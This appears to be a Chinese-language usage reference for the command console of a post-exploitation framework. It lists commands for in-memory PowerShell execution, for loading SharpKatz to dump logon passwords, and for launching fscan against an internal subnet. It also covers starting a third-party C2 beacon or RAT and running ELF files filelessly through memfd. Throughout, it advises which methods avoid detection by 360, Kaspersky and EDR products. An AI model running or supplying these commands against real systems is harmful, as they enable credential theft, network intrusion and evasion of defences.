命令中心
执行非托管powershell,也就是nopowershell的缩写,在内存中执行powershell命令。
nps的加载方式有两种,取决于profile.json中的Fork参数
当Fork = true时,跨进程执行(使用execute-assembly加载nps)
当Fork = false时,内联执行(使用inline-assembly加载)
nps ipconfig /all加载.net程序集时无需进程,避免创建进程的特性
例如SharpKatz.exe加载示例
Inline-assembly C:\Windows\SharpKatz.exe --Command logonpasswords
传统的跨进程加载.net程序集的方式类似Fork&&Run(注意这是传统的注入技术,会被360核晶和卡巴斯基检测到)
例如SharpKatz.exe加载示例示例
execute-assembly C:\Windows\SharpKatz.exe --Command logonpasswords
跨进程加载本机PE的传统方式,包括使用C/C++/Go/Rust编写的程序
例如fscan加载示例(加载时需额外添加-h)
runpe C:\Windows\fscan64.exe -h -h 192.168.1.1/24
或者加载其他PE文件启动第三方C2/RAT
runpe C:\Windows\beacon.exe
Shell在Windows、Linux、MacOS上执行普通命令,但很容易被AV/EDR检测为进程链。相对于nps来说,shell是比较不安全的渗透操作命令
shell whoami
例如加载第三方Bin文件
runpe C:\Windows\beacon.bin
Linux中fork&&run模式,实现elf文件的无文件内存执行
memfd root\home\fscan -h 192.168.1.1/24